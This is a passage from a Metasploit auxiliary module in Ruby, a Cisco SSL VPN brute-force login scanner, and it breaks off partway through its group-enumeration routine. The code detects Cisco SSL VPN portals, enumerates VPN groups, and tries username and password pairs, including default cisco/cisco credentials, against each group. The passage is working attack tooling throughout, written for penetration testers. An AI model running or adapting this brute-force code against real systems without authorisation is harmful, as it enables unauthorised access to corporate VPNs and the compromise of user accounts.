## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report include Msf::Auxiliary::AuthBrute include Msf::Auxiliary::Scanner def initialize(info={}) super(update_info(info, 'Name' => 'Cisco SSL VPN Bruteforce Login Utility', 'Description' => %{ This module scans for Cisco SSL VPN web login portals and performs login brute force to identify valid credentials. }, 'Author' => [ 'Jonathan Claudius ' ], 'License' => MSF_LICENSE, 'DefaultOptions' => { 'SSL' => true, 'USERNAME' => 'cisco', 'PASSWORD' => 'cisco' } )) register_options( [ Opt::RPORT(443), OptString.new('GROUP', [false, "A specific VPN group to use", '']) ]) register_advanced_options( [ OptBool.new('EmptyGroup', [true, "Use an empty group with authentication requests", false]) ]) end def run_host(ip) unless check_conn? vprint_error("Connection failed, Aborting...") return false end unless is_app_ssl_vpn? vprint_error("Application does not appear to be Cisco SSL VPN. Module will not continue.") return false end vprint_good("Application appears to be Cisco SSL VPN. Module will continue.") groups = Set.new if datastore['EmptyGroup'] == true groups << "" elsif datastore['GROUP'].empty? vprint_status("Attempt to Enumerate VPN Groups...") groups = enumerate_vpn_groups if groups.empty? vprint_warning("Unable to enumerate groups") vprint_warning("Using the default group: DefaultWEBVPNGroup") groups << "DefaultWEBVPNGroup" else vprint_good("Enumerated VPN Groups: #{groups.to_a.join(", ")}") end else groups << datastore['GROUP'] end vprint_status("Starting login brute force...") groups.each do |group| each_user_pass do |user, pass| do_login(user, pass, group) end end end # Verify whether the connection is working or not def check_conn? begin res = send_request_cgi('uri' => '/', 'method' => 'GET') if res vprint_good("Server is responsive...") return true end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE end false end def get_login_resource send_request_cgi( 'uri' => '/+CSCOE+/logon.html', 'method' => 'GET', 'vars_get' => { 'fcadbadd' => "1" } ) end def enumerate_vpn_groups groups = Set.new group_name_regex = /